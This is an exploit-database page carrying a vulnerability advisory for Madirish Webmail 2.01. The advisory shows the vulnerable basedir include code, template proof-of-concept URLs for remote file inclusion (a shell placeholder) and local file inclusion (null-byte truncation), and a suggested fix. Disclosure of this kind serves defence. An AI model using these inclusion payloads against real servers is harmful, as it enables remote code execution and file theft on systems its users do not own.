0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Madirish Webmail 2.01 (basedir) RFI/LFI Vulnerability

Author

eidelweiss

Risk

[

Security Risk Unsored

]

0day-ID

Category

Date add

Platform

=====================================================
Madirish Webmail 2.01 (basedir) RFI/LFI Vulnerability
=====================================================
 
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ########################################          1
0                    I'm eidelweiss member from Inj3ct0r Team          1
1                    ########################################          0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
 
Download:	http://sourceforge.net/projects/madirishwebmail/files/madirish_webmail/2.01/Madirish_Webmail.tgz/download
 
Author:		eidelweiss
Contact:	eidelweiss[at]cyberservices.com
Thank`s:    	r0073r & 0x1D (inj3ct0r) , JosS , exploit-db team , [D]eal [C]yber
		sp3x (securityreason) And All Friends.
 
	Successful exploitation requires that "register_globals" is enabled. 	
 
========================================================================
 
Description:
 
Madirish Webmail is a PHP based email agent (with an Address Book and Calendar) primarily used to access a POP3 account via the web.
The system uses MySQL and PHP, and while developed for Linux, will probably work on other platforms.
 
========================================================================
 
	-=[ VULN C0de ]=-

There is a vulnerability in almost every file directory , for example in this Directory file:

[-] Madirish_Webmail/lib/addressbook.php

*/
require_once($basedir."lib/sql.php");
require_once($basedir."lib/html.php");

*************************************************
[!]This other sample vuln c0de which affected to LFI [!]
*************************************************

[-] Madirish_Webmail/index.php

*/
require_once ("inc/config.php");	//<= 1
require_once ($basedir."lib/html.php");
require_once ($basedir."lib/common.php");	//<=2	
========================================================================
 
	-=[ P0C RFI ]=-

	http://127.0.0.1/Madirish_Webmail/lib/addressbook.php?basedir= [sh3ll inj3ct0r]

	-=[ P0C LFI ]=-

	http://127.0.0.1/Madirish_Webmail/index.php?basedir= [LFI]%00

	etc, etc, etc

========================================================================

NB:
There is a vulnerability in almost every file directory of Madirish Webmail v2.01.
Vendor fix the vulnerability in version 2.0 and update to v2.0.1
But vendor not perfectly fix the vulnerability , they just edit the code to handle Remote file inclusions,
but as we see still have RFI vulnerability and now i see possible LFI there.

Solution: Fix / Edit the code or update to new version if available, Example:

*/
require_once($basedir."lib/sql.php");	// change into require_once("Madirish_Webmail/lib/sql.php");
require_once($basedir."lib/html.php");	// change into require_once("Madirish_Webmail/lib/html.php");

=========================| -=[ E0F ]=- |=================================



#  0day.today [2024-12-26]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Madirish Webmail 2.01 (basedir) RFI/LFI Vulnerability

Report Error

Report Error